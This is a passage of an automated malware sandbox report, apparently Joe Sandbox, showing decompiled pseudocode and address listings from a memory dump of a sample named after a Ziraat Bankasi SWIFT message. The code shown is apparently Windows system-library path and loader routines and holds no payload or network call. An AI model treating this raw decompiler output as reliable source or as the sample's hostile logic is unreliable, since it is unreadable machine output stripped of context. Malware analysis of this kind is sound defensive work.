                                                                    											if(_v580 == _t321) {
                                                                    												_t322 = 0xc000000d;
                                                                    											} else {
                                                                    												L23:
                                                                    												_t173 = L018B4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
                                                                    												_t269 = _v592;
                                                                    												_t269[2] = _t173;
                                                                    												if(_t173 == 0) {
                                                                    													_t322 = 0xc0000017;
                                                                    												} else {
                                                                    													_t316 = _v556;
                                                                    													 *_t269 = 0;
                                                                    													_t321 = _t269;
                                                                    													_t269[1] = _v576;
                                                                    													_t177 =  *_v568 & 0x0000ffff;
                                                                    													L25:
                                                                    													_v580 = _t177;
                                                                    													if(_t177 == 0) {
                                                                    														L29:
                                                                    														_t307 =  *_t321 & 0x0000ffff;
                                                                    													} else {
                                                                    														_t290 =  *_t321 & 0x0000ffff;
                                                                    														_v576 = _t290;
                                                                    														_t310 = _t177 & 0x0000ffff;
                                                                    														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
                                                                    															_t307 =  *_t321 & 0xffff;
                                                                    														} else {
                                                                    															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
                                                                    															E018DF720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
                                                                    															_t329 = _t329 + 0xc;
                                                                    															_t311 = _v580;
                                                                    															_t225 =  *_t321 + _t311 & 0x0000ffff;
                                                                    															 *_t321 = _t225;
                                                                    															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
                                                                    																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                    															}
                                                                    															goto L29;
                                                                    														}
                                                                    													}
                                                                    													_t271 = _v556 - _v588 + _v588;
                                                                    													_v580 = _t307;
                                                                    													_v576 = _t271;
                                                                    													if(_t271 != 0) {
                                                                    														_t308 = _t271 & 0x0000ffff;
                                                                    														_v588 = _t308;
                                                                    														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
                                                                    															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
                                                                    															E018DF720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
                                                                    															_t329 = _t329 + 0xc;
                                                                    															_t213 =  *_t321 + _v576 & 0x0000ffff;
                                                                    															 *_t321 = _t213;
                                                                    															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
                                                                    																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
                                                                    															}
                                                                    														}
                                                                    													}
                                                                    													_t272 = _v560;
                                                                    													if(_t272 != 0) {
                                                                    														 *_t272 = _t321;
                                                                    													}
                                                                    													_t306 = 0;
                                                                    													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                    													_t275 = _v572;
                                                                    													if(_t275 != 0) {
                                                                    														_t306 =  *_t275;
                                                                    														if(_t306 != 0) {
                                                                    															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
                                                                    														}
                                                                    													}
                                                                    													_t181 = _v544;
                                                                    													if(_t181 != 0) {
                                                                    														 *_t181 = 0;
                                                                    														 *((intOrPtr*)(_t181 + 4)) = 0;
                                                                    														 *((intOrPtr*)(_t181 + 8)) = 0;
                                                                    														 *((intOrPtr*)(_t181 + 0xc)) = 0;
                                                                    														if(_v540 == 5) {
                                                                    															_t182 = E018952A5(1);
                                                                    															_v588 = _t182;
                                                                    															if(_t182 == 0) {
                                                                    																E018AEB70(1, 0x19879a0);
                                                                    																goto L38;
                                                                    															} else {
                                                                    																_v560 = _t182 + 0xc;
                                                                    																_t185 = E018AAA20( &_v556, _t182 + 0xc,  &_v556, 1);
                                                                    																if(_t185 == 0) {
                                                                    																	_t324 = _v588;
                                                                    																	goto L97;
                                                                    																} else {
                                                                    																	_t306 = _v544;
                                                                    																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
                                                                    																	 *(_t306 + 4) = _t282;
                                                                    																	_v576 = _t282;
                                                                    																	_t325 = _t316 -  *_v560 & 0x0000ffff;
                                                                    																	 *_t306 = _t325;
                                                                    																	if( *_t282 == 0x5c) {
                                                                    																		_t149 = _t325 - 2; // -2
                                                                    																		_t283 = _t149;
                                                                    																		 *_t306 = _t283;
                                                                    																		 *(_t306 + 4) = _v576 + 2;
                                                                    																		_t185 = _t283 & 0x0000ffff;
                                                                    																	}
                                                                    																	_t324 = _v588;
                                                                    																	 *(_t306 + 2) = _t185;
                                                                    																	if((_v548 & 0x00000002) == 0) {
                                                                    																		L97:
                                                                    																		asm("lock xadd [esi], eax");
                                                                    																		if((_t185 | 0xffffffff) == 0) {
                                                                    																			_push( *((intOrPtr*)(_t324 + 4)));
                                                                    																			E018D95D0();
                                                                    																			L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
                                                                    																		}
                                                                    																	} else {
                                                                    																		 *(_t306 + 0xc) = _t324;
                                                                    																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
                                                                    																	}
                                                                    																	goto L38;
                                                                    																}
                                                                    															}
                                                                    															goto L41;
                                                                    														}
                                                                    													}
                                                                    													L38:
                                                                    													_t322 = 0;
                                                                    												}
                                                                    											}
                                                                    										}
                                                                    									}
                                                                    									L39:
                                                                    									if(_t254 !=  &_v532) {
                                                                    										L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
                                                                    									}
                                                                    									_t169 = _t322;
                                                                    								}
                                                                    								goto L41;
                                                                    							}
                                                                    							goto L68;
                                                                    						}
                                                                    					}
                                                                    					L41:
                                                                    					_pop(_t317);
                                                                    					_pop(_t323);
                                                                    					_pop(_t255);
                                                                    					return E018DB640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
                                                                    				} else {
                                                                    					_t299 = __edx[2];
                                                                    					if( *_t299 == 0x5c) {
                                                                    						_t256 =  *(_t299 + 2) & 0x0000ffff;
                                                                    						if(_t256 != 0x5c) {
                                                                    							if(_t256 != 0x3f) {
                                                                    								goto L2;
                                                                    							} else {
                                                                    								goto L50;
                                                                    							}
                                                                    						} else {
                                                                    							L50:
                                                                    							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
                                                                    								goto L2;
                                                                    							} else {
                                                                    								_t251 = E018D3D43(_t315, _t321, _t157, _v560, _v572, _t305);
                                                                    								_pop(_t319);
                                                                    								_pop(_t326);
                                                                    								_pop(_t257);
                                                                    								return E018DB640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
                                                                    							}
                                                                    						}
                                                                    					} else {
                                                                    						L2:
                                                                    						_t260 = _v572;
                                                                    						goto L3;
                                                                    					}
                                                                    				}
                                                                    				L101:
                                                                    			}















































































                                                                    0x018b4128
                                                                    0x018b4135
                                                                    0x018b413c
                                                                    0x018b4141
                                                                    0x018b4145
                                                                    0x018b4147
                                                                    0x018b414e
                                                                    0x018b4151
                                                                    0x018b4159
                                                                    0x018b415c
                                                                    0x018b4160
                                                                    0x018b4164
                                                                    0x018b4168
                                                                    0x018b416c
                                                                    0x018b417f
                                                                    0x018b4181
                                                                    0x018b446a
                                                                    0x018b446a
                                                                    0x018b418c
                                                                    0x018b4195
                                                                    0x018b4199
                                                                    0x018b4432
                                                                    0x018b4439
                                                                    0x018b443d
                                                                    0x018b4442
                                                                    0x018b4447
                                                                    0x00000000
                                                                    0x018b419f
                                                                    0x018b41a3
                                                                    0x018b41b1
                                                                    0x018b41b9
                                                                    0x018b41bd
                                                                    0x018b45db
                                                                    0x018b45db
                                                                    0x00000000
                                                                    0x018b41c3
                                                                    0x018b41c3
                                                                    0x018b41ce
                                                                    0x018b41d4
                                                                    0x018fe138
                                                                    0x018fe13e
                                                                    0x018fe169
                                                                    0x018fe16d
                                                                    0x018fe19e
                                                                    0x018fe16f
                                                                    0x018fe16f
                                                                    0x018fe175
                                                                    0x018fe179
                                                                    0x018fe18f
                                                                    0x018fe193
                                                                    0x00000000
                                                                    0x018fe199
                                                                    0x00000000
                                                                    0x018fe199
                                                                    0x018fe193
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018b41da
                                                                    0x018b41da
                                                                    0x018b41df
                                                                    0x018b41e4
                                                                    0x018b41ec
                                                                    0x018b4203
                                                                    0x018b4207
                                                                    0x018fe1fd
                                                                    0x018b4222
                                                                    0x018b4226
                                                                    0x018fe1f3
                                                                    0x018fe1f3
                                                                    0x018b422c
                                                                    0x018b422c
                                                                    0x018b4233
                                                                    0x018fe1ed
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018b4239
                                                                    0x018b4239
                                                                    0x018b4239
                                                                    0x018b4239
                                                                    0x018b4233
                                                                    0x018b4226
                                                                    0x018b41ee
                                                                    0x018b41ee
                                                                    0x018b41f4
                                                                    0x018b4575
                                                                    0x018fe1b1
                                                                    0x018fe1b1
                                                                    0x00000000
                                                                    0x018b457b
                                                                    0x018b457b
                                                                    0x018b4582
                                                                    0x018fe1ab
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018b4588
                                                                    0x018b4588
                                                                    0x018b458c
                                                                    0x018fe1c4
                                                                    0x018fe1c4
                                                                    0x00000000
                                                                    0x018b4592
                                                                    0x018b4592
                                                                    0x018b4599
                                                                    0x018fe1be
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018b459f
                                                                    0x018b459f
                                                                    0x018b45a3
                                                                    0x018fe1d7
                                                                    0x018fe1e4
                                                                    0x00000000
                                                                    0x018b45a9
                                                                    0x018b45a9
                                                                    0x018b45b0
                                                                    0x018fe1d1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018b45b6
                                                                    0x018b45b6
                                                                    0x018b45b6
                                                                    0x00000000
                                                                    0x018b45b6
                                                                    0x018b45b0
                                                                    0x018b45a3
                                                                    0x018b4599
                                                                    0x018b458c
                                                                    0x018b4582
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018b41f4
                                                                    0x018b423e
                                                                    0x018b4241
                                                                    0x018b45c0
                                                                    0x018b45c4
                                                                    0x00000000
                                                                    0x018b45ca
                                                                    0x018b45ca
                                                                    0x00000000
                                                                    0x018fe207
                                                                    0x018fe20f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018b45d1
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018b45ca
                                                                    0x00000000
                                                                    0x018b4247
                                                                    0x018b4247
                                                                    0x018b4247
                                                                    0x018b4249
                                                                    0x018b4249
                                                                    0x018b4249
                                                                    0x018b4251
                                                                    0x018b4251
                                                                    0x018b4257
                                                                    0x018b425f
                                                                    0x018b426e
                                                                    0x018b4270
                                                                    0x018b427a
                                                                    0x018fe219
                                                                    0x018fe219
                                                                    0x018b4280
                                                                    0x018b4282
                                                                    0x018b4456
                                                                    0x018b45ea
                                                                    0x00000000
                                                                    0x018b45f0
                                                                    0x018fe223
                                                                    0x00000000
                                                                    0x018fe223
                                                                    0x018b445c
                                                                    0x018b445c
                                                                    0x00000000
                                                                    0x018b445c
                                                                    0x00000000
                                                                    0x018b4288
                                                                    0x018b428c
                                                                    0x018fe298
                                                                    0x018b4292
                                                                    0x018b4292
                                                                    0x018b429e
                                                                    0x018b42a3
                                                                    0x018b42a7
                                                                    0x018b42ac
                                                                    0x018fe22d
                                                                    0x018b42b2
                                                                    0x018b42b2
                                                                    0x018b42b9
                                                                    0x018b42bc
                                                                    0x018b42c2
                                                                    0x018b42ca
                                                                    0x018b42cd
                                                                    0x018b42cd
                                                                    0x018b42d4
                                                                    0x018b433f
                                                                    0x018b433f
                                                                    0x018b42d6
                                                                    0x018b42d6
                                                                    0x018b42d9
                                                                    0x018b42dd
                                                                    0x018b42eb
                                                                    0x018fe23a
                                                                    0x018b42f1
                                                                    0x018b4305
                                                                    0x018b430d
                                                                    0x018b4315
                                                                    0x018b4318
                                                                    0x018b431f
                                                                    0x018b4322
                                                                    0x018b432e
                                                                    0x018b433b
                                                                    0x018b433b
                                                                    0x00000000
                                                                    0x018b432e
                                                                    0x018b42eb
                                                                    0x018b434c
                                                                    0x018b434e
                                                                    0x018b4352
                                                                    0x018b4359
                                                                    0x018b435e
                                                                    0x018b4361
                                                                    0x018b436e
                                                                    0x018b438a
                                                                    0x018b438e
                                                                    0x018b4396
                                                                    0x018b439e
                                                                    0x018b43a1
                                                                    0x018b43ad
                                                                    0x018b43bb
                                                                    0x018b43bb
                                                                    0x018b43ad
                                                                    0x018b436e
                                                                    0x018b43bf
                                                                    0x018b43c5
                                                                    0x018b4463
                                                                    0x018b4463
                                                                    0x018b43ce
                                                                    0x018b43d5
                                                                    0x018b43d9
                                                                    0x018b43df
                                                                    0x018b4475
                                                                    0x018b4479
                                                                    0x018b4491
                                                                    0x018b4491
                                                                    0x018b4479
                                                                    0x018b43e5
                                                                    0x018b43eb
                                                                    0x018b43f4
                                                                    0x018b43f6
                                                                    0x018b43f9
                                                                    0x018b43fc
                                                                    0x018b43ff
                                                                    0x018b44e8
                                                                    0x018b44ed
                                                                    0x018b44f3
                                                                    0x018fe247
                                                                    0x00000000
                                                                    0x018b44f9
                                                                    0x018b4504
                                                                    0x018b4508
                                                                    0x018b450f
                                                                    0x018fe269
                                                                    0x00000000
                                                                    0x018b4515
                                                                    0x018b4519
                                                                    0x018b4531
                                                                    0x018b4534
                                                                    0x018b4537
                                                                    0x018b453e
                                                                    0x018b4541
                                                                    0x018b454a
                                                                    0x018fe255
                                                                    0x018fe255
                                                                    0x018fe25b
                                                                    0x018fe25e
                                                                    0x018fe261
                                                                    0x018fe261
                                                                    0x018b4555
                                                                    0x018b4559
                                                                    0x018b455d
                                                                    0x018fe26d
                                                                    0x018fe270
                                                                    0x018fe274
                                                                    0x018fe27a
                                                                    0x018fe27d
                                                                    0x018fe28e
                                                                    0x018fe28e
                                                                    0x018b4563
                                                                    0x018b4563
                                                                    0x018b4569
                                                                    0x018b4569
                                                                    0x00000000
                                                                    0x018b455d
                                                                    0x018b450f
                                                                    0x00000000
                                                                    0x018b44f3
                                                                    0x018b43ff
                                                                    0x018b4405
                                                                    0x018b4405
                                                                    0x018b4405
                                                                    0x018b42ac
                                                                    0x018b428c
                                                                    0x018b4282
                                                                    0x018b4407
                                                                    0x018b440d
                                                                    0x018fe2af
                                                                    0x018fe2af
                                                                    0x018b4413
                                                                    0x018b4413
                                                                    0x00000000
                                                                    0x018b41d4
                                                                    0x00000000
                                                                    0x018b41c3
                                                                    0x018b41bd
                                                                    0x018b4415
                                                                    0x018b4415
                                                                    0x018b4416
                                                                    0x018b4417
                                                                    0x018b4429
                                                                    0x018b416e
                                                                    0x018b416e
                                                                    0x018b4175
                                                                    0x018b4498
                                                                    0x018b449f
                                                                    0x018fe12d
                                                                    0x00000000
                                                                    0x018fe133
                                                                    0x00000000
                                                                    0x018fe133
                                                                    0x018b44a5
                                                                    0x018b44a5
                                                                    0x018b44aa
                                                                    0x00000000
                                                                    0x018b44bb
                                                                    0x018b44ca
                                                                    0x018b44d6
                                                                    0x018b44d7
                                                                    0x018b44d8
                                                                    0x018b44e3
                                                                    0x018b44e3
                                                                    0x018b44aa
                                                                    0x018b417b
                                                                    0x018b417b
                                                                    0x018b417b
                                                                    0x00000000
                                                                    0x018b417b
                                                                    0x018b4175
                                                                    0x00000000

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b7fb597dcce5f1a5d1a7a520f89e854b393be241f6d960882c5b15bd937552f6
                                                                    • Instruction ID: 91c31fde95fbe2c159ba283130094ba58a144936b1d8848225251869e5ea331e
                                                                    • Opcode Fuzzy Hash: b7fb597dcce5f1a5d1a7a520f89e854b393be241f6d960882c5b15bd937552f6
                                                                    • Instruction Fuzzy Hash: 23F17C706086118FD724CF19C4C1ABABBE1EF88714F15492EF586CB362E734DA95CB52
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 92%
                                                                    			E018C20A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
                                                                    				signed int _v16;
                                                                    				signed int _v20;
                                                                    				signed char _v24;
                                                                    				intOrPtr _v28;
                                                                    				signed int _v32;
                                                                    				void* _v36;
                                                                    				char _v48;
                                                                    				signed int _v52;
                                                                    				signed int _v56;
                                                                    				unsigned int _v60;
                                                                    				char _v64;
                                                                    				unsigned int _v68;
                                                                    				signed int _v72;
                                                                    				char _v73;
                                                                    				signed int _v74;
                                                                    				char _v75;
                                                                    				signed int _v76;
                                                                    				void* _v81;
                                                                    				void* _v82;
                                                                    				void* _v89;
                                                                    				void* _v92;
                                                                    				void* _v97;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				signed char _t128;
                                                                    				void* _t129;
                                                                    				signed int _t130;
                                                                    				void* _t132;
                                                                    				signed char _t133;
                                                                    				intOrPtr _t135;
                                                                    				signed int _t137;
                                                                    				signed int _t140;
                                                                    				signed int* _t144;
                                                                    				signed int* _t145;
                                                                    				intOrPtr _t146;
                                                                    				signed int _t147;
                                                                    				signed char* _t148;
                                                                    				signed int _t149;
                                                                    				signed int _t153;
                                                                    				signed int _t169;
                                                                    				signed int _t174;
                                                                    				signed int _t180;
                                                                    				void* _t197;
                                                                    				void* _t198;
                                                                    				signed int _t201;
                                                                    				intOrPtr* _t202;
                                                                    				intOrPtr* _t205;
                                                                    				signed int _t210;
                                                                    				signed int _t215;
                                                                    				signed int _t218;
                                                                    				signed char _t221;
                                                                    				signed int _t226;
                                                                    				char _t227;
                                                                    				signed int _t228;
                                                                    				void* _t229;
                                                                    				unsigned int _t231;
                                                                    				void* _t235;
                                                                    				signed int _t240;
                                                                    				signed int _t241;
                                                                    				void* _t242;
                                                                    				signed int _t246;
                                                                    				signed int _t248;
                                                                    				signed int _t252;
                                                                    				signed int _t253;
                                                                    				void* _t254;
                                                                    				intOrPtr* _t256;
                                                                    				intOrPtr _t257;
                                                                    				unsigned int _t262;
                                                                    				signed int _t265;
                                                                    				void* _t267;
                                                                    				signed int _t275;
                                                                    
                                                                    				_t198 = __ebx;
                                                                    				_t267 = (_t265 & 0xfffffff0) - 0x48;
                                                                    				_v68 = __ecx;
                                                                    				_v73 = 0;
                                                                    				_t201 = __edx & 0x00002000;
                                                                    				_t128 = __edx & 0xffffdfff;
                                                                    				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
                                                                    				_v72 = _t128;
                                                                    				if((_t128 & 0x00000008) != 0) {
                                                                    					__eflags = _t128 - 8;
                                                                    					if(_t128 != 8) {
                                                                    						L69:
                                                                    						_t129 = 0xc000000d;
                                                                    						goto L23;
                                                                    					} else {
                                                                    						_t130 = 0;
                                                                    						_v72 = 0;
                                                                    						_v75 = 1;
                                                                    						L2:
                                                                    						_v74 = 1;
                                                                    						_t226 =  *0x1988714; // 0x0
                                                                    						if(_t226 != 0) {
                                                                    							__eflags = _t201;
                                                                    							if(_t201 != 0) {
                                                                    								L62:
                                                                    								_v74 = 1;
                                                                    								L63:
                                                                    								_t130 = _t226 & 0xffffdfff;
                                                                    								_v72 = _t130;
                                                                    								goto L3;
                                                                    							}
                                                                    							_v74 = _t201;
                                                                    							__eflags = _t226 & 0x00002000;
                                                                    							if((_t226 & 0x00002000) == 0) {
                                                                    								goto L63;
                                                                    							}
                                                                    							goto L62;
                                                                    						}
                                                                    						L3:
                                                                    						_t227 = _v75;
                                                                    						L4:
                                                                    						_t240 = 0;
                                                                    						_v56 = 0;
                                                                    						_t252 = _t130 & 0x00000100;
                                                                    						if(_t252 != 0 || _t227 != 0) {
                                                                    							_t240 = _v68;
                                                                    							_t132 = E018C2EB0(_t240);
                                                                    							__eflags = _t132 - 2;
                                                                    							if(_t132 != 2) {
                                                                    								__eflags = _t132 - 1;
                                                                    								if(_t132 == 1) {
                                                                    									goto L25;
                                                                    								}
                                                                    								__eflags = _t132 - 6;
                                                                    								if(_t132 == 6) {
                                                                    									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
                                                                    									if( *((short*)(_t240 + 4)) != 0x3f) {
                                                                    										goto L40;
                                                                    									}
                                                                    									_t197 = E018C2EB0(_t240 + 8);
                                                                    									__eflags = _t197 - 2;
                                                                    									if(_t197 == 2) {
                                                                    										goto L25;
                                                                    									}
                                                                    								}
                                                                    								L40:
                                                                    								_t133 = 1;
                                                                    								L26:
                                                                    								_t228 = _v75;
                                                                    								_v56 = _t240;
                                                                    								__eflags = _t133;
                                                                    								if(_t133 != 0) {
                                                                    									__eflags = _t228;
                                                                    									if(_t228 == 0) {
                                                                    										L43:
                                                                    										__eflags = _v72;
                                                                    										if(_v72 == 0) {
                                                                    											goto L8;
                                                                    										}
                                                                    										goto L69;
                                                                    									}
                                                                    									_t133 = E018958EC(_t240);
                                                                    									_t221 =  *0x1985cac; // 0x16
                                                                    									__eflags = _t221 & 0x00000040;
                                                                    									if((_t221 & 0x00000040) != 0) {
                                                                    										_t228 = 0;
                                                                    										__eflags = _t252;
                                                                    										if(_t252 != 0) {
                                                                    											goto L43;
                                                                    										}
                                                                    										_t133 = _v72;
                                                                    										goto L7;
                                                                    									}
                                                                    									goto L43;
                                                                    								} else {
                                                                    									_t133 = _v72;
                                                                    									goto L6;
                                                                    								}
                                                                    							}
                                                                    							L25:
                                                                    							_t133 = _v73;
                                                                    							goto L26;
                                                                    						} else {
                                                                    							L6:
                                                                    							_t221 =  *0x1985cac; // 0x16
                                                                    							L7:
                                                                    							if(_t133 != 0) {
                                                                    								__eflags = _t133 & 0x00001000;
                                                                    								if((_t133 & 0x00001000) != 0) {
                                                                    									_t133 = _t133 | 0x00000a00;
                                                                    									__eflags = _t221 & 0x00000004;
                                                                    									if((_t221 & 0x00000004) != 0) {
                                                                    										_t133 = _t133 | 0x00000400;
                                                                    									}
                                                                    								}
                                                                    								__eflags = _t228;
                                                                    								if(_t228 != 0) {
                                                                    									_t133 = _t133 | 0x00000100;
                                                                    								}
                                                                    								_t229 = E018D4A2C(0x1986e40, 0x18d4b30, _t133, _t240);
                                                                    								__eflags = _t229;
                                                                    								if(_t229 == 0) {
                                                                    									_t202 = _a20;
                                                                    									goto L100;
                                                                    								} else {
                                                                    									_t135 =  *((intOrPtr*)(_t229 + 0x38));
                                                                    									L15:
                                                                    									_t202 = _a20;
                                                                    									 *_t202 = _t135;
                                                                    									if(_t229 == 0) {
                                                                    										L100:
                                                                    										 *_a4 = 0;
                                                                    										_t137 = _a8;
                                                                    										__eflags = _t137;
                                                                    										if(_t137 != 0) {
                                                                    											 *_t137 = 0;
                                                                    										}
                                                                    										 *_t202 = 0;
                                                                    										_t129 = 0xc0000017;
                                                                    										goto L23;
                                                                    									} else {
                                                                    										_t242 = _a16;
                                                                    										if(_t242 != 0) {
                                                                    											_t254 = _t229;
                                                                    											memcpy(_t242, _t254, 0xd << 2);
                                                                    											_t267 = _t267 + 0xc;
                                                                    											_t242 = _t254 + 0x1a;
                                                                    										}
                                                                    										_t205 = _a4;
                                                                    										_t25 = _t229 + 0x48; // 0x48
                                                                    										 *_t205 = _t25;
                                                                    										_t140 = _a8;
                                                                    										if(_t140 != 0) {
                                                                    											__eflags =  *((char*)(_t267 + 0xa));
                                                                    											if( *((char*)(_t267 + 0xa)) != 0) {
                                                                    												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
                                                                    											} else {
                                                                    												 *_t140 = 0;
                                                                    											}
                                                                    										}
                                                                    										_t256 = _a12;
                                                                    										if(_t256 != 0) {
                                                                    											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
                                                                    										}
                                                                    										_t257 =  *_t205;
                                                                    										_v48 = 0;
                                                                    										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
                                                                    										_v56 = 0;
                                                                    										_v52 = 0;
                                                                    										_t144 =  *( *[fs:0x30] + 0x50);
                                                                    										if(_t144 != 0) {
                                                                    											__eflags =  *_t144;
                                                                    											if( *_t144 == 0) {
                                                                    												goto L20;
                                                                    											}
                                                                    											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                                                    											goto L21;
                                                                    										} else {
                                                                    											L20:
                                                                    											_t145 = 0x7ffe0384;
                                                                    											L21:
                                                                    											if( *_t145 != 0) {
                                                                    												_t146 =  *[fs:0x30];
                                                                    												__eflags =  *(_t146 + 0x240) & 0x00000004;
                                                                    												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
                                                                    													_t147 = E018B7D50();
                                                                    													__eflags = _t147;
                                                                    													if(_t147 == 0) {
                                                                    														_t148 = 0x7ffe0385;
                                                                    													} else {
                                                                    														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                                                                    													}
                                                                    													__eflags =  *_t148 & 0x00000020;
                                                                    													if(( *_t148 & 0x00000020) != 0) {
                                                                    														_t149 = _v72;
                                                                    														__eflags = _t149;
                                                                    														if(__eflags == 0) {
                                                                    															_t149 = 0x1875c80;
                                                                    														}
                                                                    														_push(_t149);
                                                                    														_push( &_v48);
                                                                    														 *((char*)(_t267 + 0xb)) = E018CF6E0(_t198, _t242, _t257, __eflags);
                                                                    														_push(_t257);
                                                                    														_push( &_v64);
                                                                    														_t153 = E018CF6E0(_t198, _t242, _t257, __eflags);
                                                                    														__eflags =  *((char*)(_t267 + 0xb));
                                                                    														if( *((char*)(_t267 + 0xb)) != 0) {
                                                                    															__eflags = _t153;
                                                                    															if(_t153 != 0) {
                                                                    																__eflags = 0;
                                                                    																E01917016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
                                                                    																L018B2400(_t267 + 0x20);
                                                                    															}
                                                                    															L018B2400( &_v64);
                                                                    														}
                                                                    													}
                                                                    												}
                                                                    											}
                                                                    											_t129 = 0;
                                                                    											L23:
                                                                    											return _t129;
                                                                    										}
                                                                    									}
                                                                    								}
                                                                    							}
                                                                    							L8:
                                                                    							_t275 = _t240;
                                                                    							if(_t275 != 0) {
                                                                    								_v73 = 0;
                                                                    								_t253 = 0;
                                                                    								__eflags = 0;
                                                                    								L29:
                                                                    								_push(0);
                                                                    								_t241 = E018C2397(_t240);
                                                                    								__eflags = _t241;
                                                                    								if(_t241 == 0) {
                                                                    									_t229 = 0;
                                                                    									L14:
                                                                    									_t135 = 0;
                                                                    									goto L15;
                                                                    								}
                                                                    								__eflags =  *((char*)(_t267 + 0xb));
                                                                    								 *(_t241 + 0x34) = 1;
                                                                    								if( *((char*)(_t267 + 0xb)) != 0) {
                                                                    									E018B2280(_t134, 0x1988608);
                                                                    									__eflags =  *0x1986e48 - _t253; // 0x0
                                                                    									if(__eflags != 0) {
                                                                    										L48:
                                                                    										_t253 = 0;
                                                                    										__eflags = 0;
                                                                    										L49:
                                                                    										E018AFFB0(_t198, _t241, 0x1988608);
                                                                    										__eflags = _t253;
                                                                    										if(_t253 != 0) {
                                                                    											L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
                                                                    										}
                                                                    										goto L31;
                                                                    									}
                                                                    									 *0x1986e48 = _t241;
                                                                    									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
                                                                    									__eflags = _t253;
                                                                    									if(_t253 != 0) {
                                                                    										_t57 = _t253 + 0x34;
                                                                    										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
                                                                    										__eflags =  *_t57;
                                                                    										if( *_t57 == 0) {
                                                                    											goto L49;
                                                                    										}
                                                                    									}
                                                                    									goto L48;
                                                                    								}
                                                                    								L31:
                                                                    								_t229 = _t241;
                                                                    								goto L14;
                                                                    							}
                                                                    							_v73 = 1;
                                                                    							_v64 = _t240;
                                                                    							asm("lock bts dword [esi], 0x0");
                                                                    							if(_t275 < 0) {
                                                                    								_t231 =  *0x1988608; // 0x0
                                                                    								while(1) {
                                                                    									_v60 = _t231;
                                                                    									__eflags = _t231 & 0x00000001;
                                                                    									if((_t231 & 0x00000001) != 0) {
                                                                    										goto L76;
                                                                    									}
                                                                    									_t73 = _t231 + 1; // 0x1
                                                                    									_t210 = _t73;
                                                                    									asm("lock cmpxchg [edi], ecx");
                                                                    									__eflags = _t231 - _t231;
                                                                    									if(_t231 != _t231) {
                                                                    										L92:
                                                                    										_t133 = E018C6B90(_t210,  &_v64);
                                                                    										_t262 =  *0x1988608; // 0x0
                                                                    										L93:
                                                                    										_t231 = _t262;
                                                                    										continue;
                                                                    									}
                                                                    									_t240 = _v56;
                                                                    									goto L10;
                                                                    									L76:
                                                                    									_t169 = E018CE180(_t133);
                                                                    									__eflags = _t169;
                                                                    									if(_t169 != 0) {
                                                                    										_push(0xc000004b);
                                                                    										_push(0xffffffff);
                                                                    										E018D97C0();
                                                                    										_t231 = _v68;
                                                                    									}
                                                                    									_v72 = 0;
